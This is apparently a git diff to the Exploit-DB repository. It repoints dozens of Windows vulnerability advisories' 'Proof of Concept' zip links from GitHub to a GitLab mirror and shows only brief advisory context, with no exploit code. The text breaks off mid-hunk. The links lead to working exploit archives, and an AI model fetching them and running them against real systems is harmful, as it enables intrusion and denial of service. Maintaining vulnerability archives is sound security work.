a/exploits/windows/dos/43373.txt +++ b/exploits/windows/dos/43373.txt @@ -90,4 +90,4 @@ The service tries to execute invalid memory at 0x18181818 (or at least crashes o Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43373.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43373.zip \ No newline at end of file diff --git a/exploits/windows/dos/43446.txt b/exploits/windows/dos/43446.txt index 794af443a..74a1033dd 100644 --- a/exploits/windows/dos/43446.txt +++ b/exploits/windows/dos/43446.txt @@ -109,4 +109,4 @@ There is the text I set via SetWindowText(). Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43446.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43446.zip \ No newline at end of file diff --git a/exploits/windows/dos/43515.txt b/exploits/windows/dos/43515.txt index 3aef1e74a..b48d82c2c 100644 --- a/exploits/windows/dos/43515.txt +++ b/exploits/windows/dos/43515.txt @@ -37,4 +37,4 @@ Observed Result: The Non-AC anonymous token is impersonated. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43515.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43515.zip \ No newline at end of file diff --git a/exploits/windows/dos/43516.txt b/exploits/windows/dos/43516.txt index 699a7a195..ef8dd5998 100644 --- a/exploits/windows/dos/43516.txt +++ b/exploits/windows/dos/43516.txt @@ -25,4 +25,4 @@ The anonymous token is a normal AC. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43516.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43516.zip \ No newline at end of file diff --git a/exploits/windows/dos/43517.txt b/exploits/windows/dos/43517.txt index 044881c97..933f43364 100644 --- a/exploits/windows/dos/43517.txt +++ b/exploits/windows/dos/43517.txt @@ -33,4 +33,4 @@ The direct open fails with STATUS_IO_REPARSE_DATA_INVALID however the one via SM Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43517.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43517.zip \ No newline at end of file diff --git a/exploits/windows/dos/4375.txt b/exploits/windows/dos/4375.txt index 56c326618..e56b65cdc 100644 --- a/exploits/windows/dos/4375.txt +++ b/exploits/windows/dos/4375.txt @@ -1,5 +1,5 @@ BaoFeng2 Mps.dll Activex Multiple Remote Buffer Overflow PoC -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4375.zip (09082007-storm.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4375.zip (09082007-storm.zip) # milw0rm.com [2007-09-08] \ No newline at end of file diff --git a/exploits/windows/dos/44096.txt b/exploits/windows/dos/44096.txt index 8d4b6b475..161f3f8d2 100644 --- a/exploits/windows/dos/44096.txt +++ b/exploits/windows/dos/44096.txt @@ -193,4 +193,4 @@ A screenshot of WinDBG showing this final step is attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44096.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44096.zip \ No newline at end of file diff --git a/exploits/windows/dos/44402.txt b/exploits/windows/dos/44402.txt index 518623030..3dd0224e2 100644 --- a/exploits/windows/dos/44402.txt +++ b/exploits/windows/dos/44402.txt @@ -49,4 +49,4 @@ A minimal sample RAR file that exhibits these traits & causes mpengine to corrup Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44402.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44402.zip \ No newline at end of file diff --git a/exploits/windows/dos/44466.txt b/exploits/windows/dos/44466.txt index 950f263d2..689f84145 100644 --- a/exploits/windows/dos/44466.txt +++ b/exploits/windows/dos/44466.txt @@ -45,4 +45,4 @@ The signing level cache is applied to the file with no further verification. You Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44466.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44466.zip \ No newline at end of file diff --git a/exploits/windows/dos/44467.txt b/exploits/windows/dos/44467.txt index 648158f27..33d7d3176 100644 --- a/exploits/windows/dos/44467.txt +++ b/exploits/windows/dos/44467.txt @@ -70,4 +70,4 @@ The issue was identified by James Forshaw and Ivan Fratric. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44467.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44467.zip \ No newline at end of file diff --git a/exploits/windows/dos/44914.txt b/exploits/windows/dos/44914.txt index 9bbbfede7..1b02a1895 100644 --- a/exploits/windows/dos/44914.txt +++ b/exploits/windows/dos/44914.txt @@ -47,4 +47,4 @@ The directories are created, the application will still fail. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44914.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44914.zip \ No newline at end of file diff --git a/exploits/windows/dos/44915.txt b/exploits/windows/dos/44915.txt index 5f15991f7..acbd91755 100644 --- a/exploits/windows/dos/44915.txt +++ b/exploits/windows/dos/44915.txt @@ -36,4 +36,4 @@ The file badgers.dll is created in the system32 folder which is writable by a no Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44915.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44915.zip \ No newline at end of file diff --git a/exploits/windows/dos/45435.txt b/exploits/windows/dos/45435.txt index 87e164d30..9f035e2ab 100644 --- a/exploits/windows/dos/45435.txt +++ b/exploits/windows/dos/45435.txt @@ -38,4 +38,4 @@ The signing level cache is applied to the file with no further verification. You Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45435.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45435.zip \ No newline at end of file diff --git a/exploits/windows/dos/45436.txt b/exploits/windows/dos/45436.txt index 066825873..64097e098 100644 --- a/exploits/windows/dos/45436.txt +++ b/exploits/windows/dos/45436.txt @@ -259,4 +259,4 @@ The object’s reference count is corrupted. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45436.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45436.zip \ No newline at end of file diff --git a/exploits/windows/dos/45624.txt b/exploits/windows/dos/45624.txt index 8e1a07f35..d24981871 100644 --- a/exploits/windows/dos/45624.txt +++ b/exploits/windows/dos/45624.txt @@ -24,4 +24,4 @@ The files owned by the user are listed to the console. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45624.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45624.zip \ No newline at end of file diff --git a/exploits/windows/dos/46022.txt b/exploits/windows/dos/46022.txt index 659395436..a21554564 100644 --- a/exploits/windows/dos/46022.txt +++ b/exploits/windows/dos/46022.txt @@ -57,4 +57,4 @@ leak2.html demonstrates this and leak2.txt contains the debug log (obtained in a Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46022.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46022.zip \ No newline at end of file diff --git a/exploits/windows/dos/46023.txt b/exploits/windows/dos/46023.txt index 43828c007..8ae976ce6 100644 --- a/exploits/windows/dos/46023.txt +++ b/exploits/windows/dos/46023.txt @@ -8,4 +8,4 @@ This has been tested on Windows 10 Version 1803 with the latest patches applied Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46023.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46023.zip \ No newline at end of file diff --git a/exploits/windows/dos/46184.txt b/exploits/windows/dos/46184.txt index 295ba123a..c3603c2e1 100644 --- a/exploits/windows/dos/46184.txt +++ b/exploits/windows/dos/46184.txt @@ -69,4 +69,4 @@ The unmarshal process succeeds and the second call to obj.FullPath fails with an Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46184.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46184.zip \ No newline at end of file diff --git a/exploits/windows/dos/47028.txt b/exploits/windows/dos/47028.txt index 68c2d15f8..1c0a6aa63 100644 --- a/exploits/windows/dos/47028.txt +++ b/exploits/windows/dos/47028.txt @@ -39,4 +39,4 @@ The arbitrary directory was created and is writable by the current user. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47028.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47028.zip \ No newline at end of file diff --git a/exploits/windows/dos/47029.txt b/exploits/windows/dos/47029.txt index 8f6c01642..ec11a7506 100644 --- a/exploits/windows/dos/47029.txt +++ b/exploits/windows/dos/47029.txt @@ -67,4 +67,4 @@ The event buffer section object can be duplicated back to writable and the event Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47029.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47029.zip \ No newline at end of file diff --git a/exploits/windows/dos/47084.txt b/exploits/windows/dos/47084.txt index 0157d8d49..ff0f7d5ae 100644 --- a/exploits/windows/dos/47084.txt +++ b/exploits/windows/dos/47084.txt @@ -69,4 +69,4 @@ The issue reproduces on a fully updated Windows 10 1709; we haven't tested earli Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47084.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47084.zip \ No newline at end of file diff --git a/exploits/windows/dos/47086.txt b/exploits/windows/dos/47086.txt index 115433230..a51cef395 100644 --- a/exploits/windows/dos/47086.txt +++ b/exploits/windows/dos/47086.txt @@ -147,4 +147,4 @@ Evaluate expression: 934781566928 = 000000d9`a552bfd0 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47086.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47086.zip \ No newline at end of file diff --git a/exploits/windows/dos/47087.txt b/exploits/windows/dos/47087.txt index 17145e714..ab12d135c 100644 --- a/exploits/windows/dos/47087.txt +++ b/exploits/windows/dos/47087.txt @@ -227,4 +227,4 @@ Where the t2cstr.c:992 line is: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47087.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47087.zip \ No newline at end of file diff --git a/exploits/windows/dos/47088.txt b/exploits/windows/dos/47088.txt index 4f720c789..27313a02c 100644 --- a/exploits/windows/dos/47088.txt +++ b/exploits/windows/dos/47088.txt @@ -162,4 +162,4 @@ TEB at 0000000b2b0ae000 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47088.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47088.zip \ No newline at end of file diff --git a/exploits/windows/dos/47089.txt b/exploits/windows/dos/47089.txt index 8172af585..c20c50b36 100644 --- a/exploits/windows/dos/47089.txt +++ b/exploits/windows/dos/47089.txt @@ -139,4 +139,4 @@ Shadow byte legend (one shadow byte represents 8 application bytes): Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47089.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47089.zip \ No newline at end of file diff --git a/exploits/windows/dos/47090.txt b/exploits/windows/dos/47090.txt index b8da0b807..f1561272a 100644 --- a/exploits/windows/dos/47090.txt +++ b/exploits/windows/dos/47090.txt @@ -158,4 +158,4 @@ $1 = (dnaCtx) 0xbebebebebebebebe Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47090.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47090.zip \ No newline at end of file diff --git a/exploits/windows/dos/47091.txt b/exploits/windows/dos/47091.txt index 8a55bca51..c2c876a77 100644 --- a/exploits/windows/dos/47091.txt +++ b/exploits/windows/dos/47091.txt @@ -174,4 +174,4 @@ Shadow byte legend (one shadow byte represents 8 application bytes): Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47091.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47091.zip \ No newline at end of file diff --git a/exploits/windows/dos/47092.txt b/exploits/windows/dos/47092.txt index 717f5f8b7..8aa892a63 100644 --- a/exploits/windows/dos/47092.txt +++ b/exploits/windows/dos/47092.txt @@ -204,4 +204,4 @@ DWrite!t2Decode+0x119c: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47092.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47092.zip \ No newline at end of file diff --git a/exploits/windows/dos/47093.txt b/exploits/windows/dos/47093.txt index ee07095b0..a7ba6fbee 100644 --- a/exploits/windows/dos/47093.txt +++ b/exploits/windows/dos/47093.txt @@ -136,4 +136,4 @@ Shadow byte legend (one shadow byte represents 8 application bytes): Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47093.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47093.zip \ No newline at end of file diff --git a/exploits/windows/dos/47094.txt b/exploits/windows/dos/47094.txt index a10f261dc..ec6d8a27e 100644 --- a/exploits/windows/dos/47094.txt +++ b/exploits/windows/dos/47094.txt @@ -191,4 +191,4 @@ Evaluate expression: 130968 = 00000000`0001ff98 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47094.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47094.zip \ No newline at end of file diff --git a/exploits/windows/dos/47095.txt b/exploits/windows/dos/47095.txt index dc858a046..1ee7febb3 100644 --- a/exploits/windows/dos/47095.txt +++ b/exploits/windows/dos/47095.txt @@ -248,4 +248,4 @@ Evaluate expression: 2547 = 00000000`000009f3 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47095.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47095.zip \ No newline at end of file diff --git a/exploits/windows/dos/47096.txt b/exploits/windows/dos/47096.txt index a6d7fe502..a7ddf1696 100644 --- a/exploits/windows/dos/47096.txt +++ b/exploits/windows/dos/47096.txt @@ -178,4 +178,4 @@ Shadow byte legend (one shadow byte represents 8 application bytes): Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47096.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47096.zip \ No newline at end of file diff --git a/exploits/windows/dos/47097.txt b/exploits/windows/dos/47097.txt index 099fc7ef3..242024e33 100644 --- a/exploits/windows/dos/47097.txt +++ b/exploits/windows/dos/47097.txt @@ -269,4 +269,4 @@ DWrite!srcSeek: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47097.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47097.zip \ No newline at end of file diff --git a/exploits/windows/dos/47098.txt b/exploits/windows/dos/47098.txt index 24cfbb19f..ffab6e77f 100644 --- a/exploits/windows/dos/47098.txt +++ b/exploits/windows/dos/47098.txt @@ -300,4 +300,4 @@ DWrite!fillSet+0x33: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47098.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47098.zip \ No newline at end of file diff --git a/exploits/windows/dos/47099.txt b/exploits/windows/dos/47099.txt index 2f50ec245..a023d15be 100644 --- a/exploits/windows/dos/47099.txt +++ b/exploits/windows/dos/47099.txt @@ -162,4 +162,4 @@ Evaluate expression: 5457134919 = 00000001`45454547 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47099.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47099.zip \ No newline at end of file diff --git a/exploits/windows/dos/47100.txt b/exploits/windows/dos/47100.txt index 00f4d1048..071a26827 100644 --- a/exploits/windows/dos/47100.txt +++ b/exploits/windows/dos/47100.txt @@ -183,4 +183,4 @@ Evaluate expression: 65535 = 00000000`0000ffff Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47100.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47100.zip \ No newline at end of file diff --git a/exploits/windows/dos/47101.txt b/exploits/windows/dos/47101.txt index 13db512dd..0bce63ffd 100644 --- a/exploits/windows/dos/47101.txt +++ b/exploits/windows/dos/47101.txt @@ -373,4 +373,4 @@ Evaluate expression: 50 = 00000000`00000032 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47101.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47101.zip \ No newline at end of file diff --git a/exploits/windows/dos/47102.txt b/exploits/windows/dos/47102.txt index f2abc151b..a58ff885d 100644 --- a/exploits/windows/dos/47102.txt +++ b/exploits/windows/dos/47102.txt @@ -260,4 +260,4 @@ eax 0x100 256 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47102.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47102.zip \ No newline at end of file diff --git a/exploits/windows/dos/47103.txt b/exploits/windows/dos/47103.txt index 55a11a90b..8cb03b97d 100644 --- a/exploits/windows/dos/47103.txt +++ b/exploits/windows/dos/47103.txt @@ -200,4 +200,4 @@ Evaluate expression: 1883117648224 = 000001b6`728ef960 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47103.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47103.zip \ No newline at end of file diff --git a/exploits/windows/dos/47113.txt b/exploits/windows/dos/47113.txt index c8822b843..117b0a5e0 100644 --- a/exploits/windows/dos/47113.txt +++ b/exploits/windows/dos/47113.txt @@ -59,4 +59,4 @@ The issue reproduces on a fully updated Windows 10 1709; we haven't tested earli Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47113.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47113.zip \ No newline at end of file diff --git a/exploits/windows/dos/47259.txt b/exploits/windows/dos/47259.txt index e4faf07a3..9c94099f2 100644 --- a/exploits/windows/dos/47259.txt +++ b/exploits/windows/dos/47259.txt @@ -202,4 +202,4 @@ cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210297 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47259.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47259.zip \ No newline at end of file diff --git a/exploits/windows/dos/47260.txt b/exploits/windows/dos/47260.txt index b667b4742..8b8043466 100644 --- a/exploits/windows/dos/47260.txt +++ b/exploits/windows/dos/47260.txt @@ -211,4 +211,4 @@ And it is clear that almost none of the memory under [EAX] is initialized at the Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47260.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47260.zip \ No newline at end of file diff --git a/exploits/windows/dos/47261.txt b/exploits/windows/dos/47261.txt index 16a462fbe..bc08fd5d2 100644 --- a/exploits/windows/dos/47261.txt +++ b/exploits/windows/dos/47261.txt @@ -74,4 +74,4 @@ The issue reproduces on a fully updated Windows 10 1709; we haven't tested earli Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47261.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47261.zip \ No newline at end of file diff --git a/exploits/windows/dos/47262.txt b/exploits/windows/dos/47262.txt index 772c53ce5..c804006cd 100644 --- a/exploits/windows/dos/47262.txt +++ b/exploits/windows/dos/47262.txt @@ -66,4 +66,4 @@ The issue reproduces on a fully updated Windows 10 1709; we haven't tested earli Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47262.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47262.zip \ No newline at end of file diff --git a/exploits/windows/dos/47263.txt b/exploits/windows/dos/47263.txt index 446d5d32c..c30aedbe1 100644 --- a/exploits/windows/dos/47263.txt +++ b/exploits/windows/dos/47263.txt @@ -59,4 +59,4 @@ The issue reproduces on a fully updated Windows 10 1709; we haven't tested earli Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47263.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47263.zip \ No newline at end of file diff --git a/exploits/windows/dos/47264.txt b/exploits/windows/dos/47264.txt index d59df5fab..2ec19b7c6 100644 --- a/exploits/windows/dos/47264.txt +++ b/exploits/windows/dos/47264.txt @@ -59,4 +59,4 @@ The issue reproduces on a fully updated Windows 10 1709; we haven't tested earli Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47264.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47264.zip \ No newline at end of file diff --git a/exploits/windows/dos/47265.txt b/exploits/windows/dos/47265.txt index 4ceb093ff..fbda700c3 100644 --- a/exploits/windows/dos/47265.txt +++ b/exploits/windows/dos/47265.txt @@ -57,4 +57,4 @@ The issue reproduces on a fully updated Windows 10 1709; we haven't tested earli Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47265.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47265.zip \ No newline at end of file diff --git a/exploits/windows/dos/47266.txt b/exploits/windows/dos/47266.txt index 85e6b882c..5b2b98157 100644 --- a/exploits/windows/dos/47266.txt +++ b/exploits/windows/dos/47266.txt @@ -56,4 +56,4 @@ The issue reproduces on a fully updated Windows 10 1709; we haven't tested earli Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47266.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47266.zip \ No newline at end of file diff --git a/exploits/windows/dos/47267.txt b/exploits/windows/dos/47267.txt index b6254279f..0781ab58f 100644 --- a/exploits/windows/dos/47267.txt +++ b/exploits/windows/dos/47267.txt @@ -58,4 +58,4 @@ The issue reproduces on a fully updated Windows 10 1709; we haven't tested earli Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47267.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47267.zip \ No newline at end of file diff --git a/exploits/windows/dos/47268.txt b/exploits/windows/dos/47268.txt index bbcaa7d15..76c59a781 100644 --- a/exploits/windows/dos/47268.txt +++ b/exploits/windows/dos/47268.txt @@ -68,4 +68,4 @@ The issue reproduces on a fully updated Windows 10 1709; we haven't tested earli Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47268.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47268.zip \ No newline at end of file diff --git a/exploits/windows/dos/47269.txt b/exploits/windows/dos/47269.txt index 99b789ecc..ec1590e20 100644 --- a/exploits/windows/dos/47269.txt +++ b/exploits/windows/dos/47269.txt @@ -53,4 +53,4 @@ The issue reproduces on a fully updated Windows 10 1709; we haven't tested earli Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47269.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47269.zip \ No newline at end of file diff --git a/exploits/windows/dos/47270.txt b/exploits/windows/dos/47270.txt index 1ceead491..ef4d67435 100644 --- a/exploits/windows/dos/47270.txt +++ b/exploits/windows/dos/47270.txt @@ -99,4 +99,4 @@ Notes: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47270.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47270.zip \ No newline at end of file diff --git a/exploits/windows/dos/47271.txt b/exploits/windows/dos/47271.txt index 281cede53..6225cfe2e 100644 --- a/exploits/windows/dos/47271.txt +++ b/exploits/windows/dos/47271.txt @@ -141,4 +141,4 @@ Notes: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47271.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47271.zip \ No newline at end of file diff --git a/exploits/windows/dos/47272.txt b/exploits/windows/dos/47272.txt index c01be1fab..f5d7623da 100644 --- a/exploits/windows/dos/47272.txt +++ b/exploits/windows/dos/47272.txt @@ -46,4 +46,4 @@ Notes: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47272.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47272.zip \ No newline at end of file diff --git a/exploits/windows/dos/47273.txt b/exploits/windows/dos/47273.txt index 282053ea1..ff527fbfa 100644 --- a/exploits/windows/dos/47273.txt +++ b/exploits/windows/dos/47273.txt @@ -70,4 +70,4 @@ Notes: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47273.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47273.zip \ No newline at end of file diff --git a/exploits/windows/dos/47274.txt b/exploits/windows/dos/47274.txt index 7b385c86e..863331e78 100644 --- a/exploits/windows/dos/47274.txt +++ b/exploits/windows/dos/47274.txt @@ -91,4 +91,4 @@ Notes: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47274.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47274.zip \ No newline at end of file diff --git a/exploits/windows/dos/47275.txt b/exploits/windows/dos/47275.txt index 0ffb4baf7..46adeb81a 100644 --- a/exploits/windows/dos/47275.txt +++ b/exploits/windows/dos/47275.txt @@ -101,4 +101,4 @@ Notes: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47275.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47275.zip \ No newline at end of file diff --git a/exploits/windows/dos/47276.txt b/exploits/windows/dos/47276.txt index 4d92a05f4..295fa9e82 100644 --- a/exploits/windows/dos/47276.txt +++ b/exploits/windows/dos/47276.txt @@ -88,4 +88,4 @@ Notes: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47276.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47276.zip \ No newline at end of file diff --git a/exploits/windows/dos/47277.txt b/exploits/windows/dos/47277.txt index 595ec1a4b..68ced8cb0 100644 --- a/exploits/windows/dos/47277.txt +++ b/exploits/windows/dos/47277.txt @@ -132,4 +132,4 @@ Notes: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47277.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47277.zip \ No newline at end of file diff --git a/exploits/windows/dos/47278.txt b/exploits/windows/dos/47278.txt index 750fae162..034efd086 100644 --- a/exploits/windows/dos/47278.txt +++ b/exploits/windows/dos/47278.txt @@ -83,4 +83,4 @@ Notes: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47278.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47278.zip \ No newline at end of file diff --git a/exploits/windows/dos/47279.txt b/exploits/windows/dos/47279.txt index 146f3aa1c..01c3fe443 100644 --- a/exploits/windows/dos/47279.txt +++ 